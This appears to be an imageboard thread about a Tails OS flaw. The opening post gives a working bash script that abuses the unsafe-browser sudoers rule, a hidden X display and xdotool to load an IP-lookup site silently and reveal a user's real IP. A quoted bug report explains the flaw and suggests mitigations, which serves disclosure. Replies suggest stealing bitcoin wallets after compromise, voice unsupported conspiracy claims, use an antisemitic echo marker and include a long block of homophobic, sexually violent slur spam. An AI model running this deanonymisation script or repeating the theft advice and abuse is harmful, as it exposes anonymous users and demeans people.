Tails Amnesia Public IP Leak

Because of a sudoder.d rule to allow running sudo unsafe-browser with NOPASSWD, this example script can run in the background and leak your public IP with no interaction or indication it's happening. No Privilege Escalation needed
#!/bin/bashexport DISPLAY=:69mv /run/user/1000/bus{,.bak}Xvfb $DISPLAY -r -nocursor & xpid=$!sleep 1sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &xdotool search --sync --name zenity 1>/dev/nullxdotool key --delay 200 Tab Returnxdotool search --sync --name Unsafe 1>/dev/nullxdotool key --delay 200 ctrl+lxdotool type --delay 200 www.yourip.usxdotool key --delay 200 Returnxdotool search --sync --name Your getwindowname | awk '{print $5}'mv /run/user/1000/bus{.bak,}kill "$xpid" exit 0

Other urls found in this thread:

heads.dyne.org/
redmine.tails.boum.org/code/issues/15635
git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser
chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection
tails.boum.org/contribute/design/Unsafe_Browser/
reddit.com/r/darknetmarketsnoobs
twitter.com/NSFWRedditGif

Tails is just debian with iptables andan upgrade program included

that's literally every linux distro ever

how's that going to happen exactly?
just have it connect to a server set up to listen for such requests.
what is that server going to do with this information? If it can't be correlated with anything, it's just "someone ran Tails on this IP"

this is why whonix style is superior
always have a workstation vm and a gateway vm
ensure the workstation only connect to the internet via tor ports, nat is disabled, everything firewalled off, etc.
no matter how much you fuck up on the workstation it will be nearly impossible to connect to anything outside of the tor ports on the gateway, short of exploit allowing you to jump out of a VM, but then your fucked anyway.

That's just an example, you can do worse things, you just need to compromise the amnesia account first, which I consider gameover anyway.

It uses x fuckery to run hidden gui prorgrams and xdotool to simulate mouse and keynoard presses. the script just navigates to www.yourip.us in the unsafe browser and reads the window name, all while it's hidden from view

Is the point of this thread that executing untrusted scripts in Tails can be dangerous?

heads.dyne.org/

...

Isn't that supposed to be a operating system for security/privacy? Where's the statically compiled musl? Where's the GRSEC and RBAC? is this a joke?

i become curl | bash destroyer of noobs

UNIX has more holes than Swiss cheese.

Subject: Re: UNIX (In)Security> From: AB > > I'm trying to convince my favorite TLA official that> putting data on a UNIX machine on the TLA network is about> as secure as posting it to alt.flame. Does anyone have a> document on UNIX (in)security I could pass on?alt.flame would be inappropriate if the material in questionisn't a flame or a response to one. I suggest tla.bboard ifthe data is about things of general interest (like how muchcertain people make).Or, you could just put it up for anonymous ftp with the Xsources (eww!) on export.eve.rcl.ear. Then post a "ThEsEkrIt Tla dATa yoU hAve BeEn waItInG foR is ONeXpoRt.eve.rcl.ear" message to misc.wanted.Seriously, look at the Kerberos papers. Look at the OrangeBook (trusted systems evaluation manual from the NCSC).Realize that Unix security is like swiss cheese - not aJarlsberg or other cheese with a few big holes in it, but anAlpine Lace cheese with thousands of tiny holes in it whichyou could never plug all of. You can wrap it in saran wrap,but you've still done nothing for the underlying structure,save for reducing the rate at which mold grows on it.

the point is that tails claims the amnesia user cant leak your real IP without escalating to another user (priv escalation exploit). The OP shows it can.

sudo rm /etc/sudoers.d/zzz_unsafe-browser

issue fixed

This.
Allowing access to the regular internet is just an accident waiting to happen.

There has been a ticket for this for almost a year but it's been ignored.
redmine.tails.boum.org/code/issues/15635

The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.

The existence of the clearnet user and the sudoers whitelist1 for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I've seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:

The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:

Disable the browser by default, requiring it to be explicitly enabled in the splash screen.
Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.
Attempt captive portal detection2 to detect request rewrites and enable the Unsafe Browser only then.

I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents3. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.

[1]: git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser
[2]: chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection
[3]: tails.boum.org/contribute/design/Unsafe_Browser/

I wouldn't trust heads, an early version had the controlport open for To without a filter/whitelist and a simple GETINFO address to the Tor controlport would reveal your true IP. It's since been fixed but that's an amatuer mistake.

Who cares about their IP? If you can get RCE on a tails user, go for the electrum/bitcoin wallet. 90% of people who use tails are drug dealers/buyers.

Before reddit.com/r/darknetmarketsnoobs was banned, it has thousands of viewers a day and all the posts were mostly normies having issues running Tails.

Also, a simple priv escalation bug just was fixed in the latest version of heads 0.4. Updates weren't even GPG signed. Use heads with caution.

How does tails get millions of dollar in donations? I literally made something that works exactly like tails with debian live-build in 3 days with a few hours of work a day. It didn't have the auto update infrastructure but still. It was the same way that tails build images, through deban live-build scripts with a packagelist and preconfigured configs.

How much are you paying your shills? How many news sites have you had publish a shill piece on it?
At least you can reap some benefits from security by obscurity.

>trusting Tails Amnesia just because Ed "the Clown In America who used his NSA clearance to fuck with the NSA ops as former CIA double-acting baking soda agent" told them he uses it and he's famous like there's 3 movies about him and big posters looking like he's 2013 Che Guevarra .
"Let's shill a justwerks (((anonymous))) system pack for pesky journalists, traitorous insiders, and whistleblowers that are against or a threat to our agendas. Now that they watched those movies of their rockstar super hero Snowden or even most of his speeches they'll fall to memetics and quickly use and trust our tools like a tool (not a pun) and so that then we can kill these very threatening pesky pests so we can finally see the light in our grand agendas."
"say no more" -Ed

Attached: hello.png (220x98 4.49 KB, 4.5K)

Slush fund from the big 3

Subject: Re: boypuss and mei am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot please rape my face i am a huge faggot

Notice how this NSA shill spreads FUD without backing up his claims or even offering secure alternatives to what he perceives as a honeypot. Begone officer.

Windows has more holes than the average claim on Zig Forums but life goes on. Also linux is not unix.

based

Are you a Microsoft shill, else why are you bringing up Windows?
Correct, but it and the user spaces that are commonly paired with it are UNIX-like.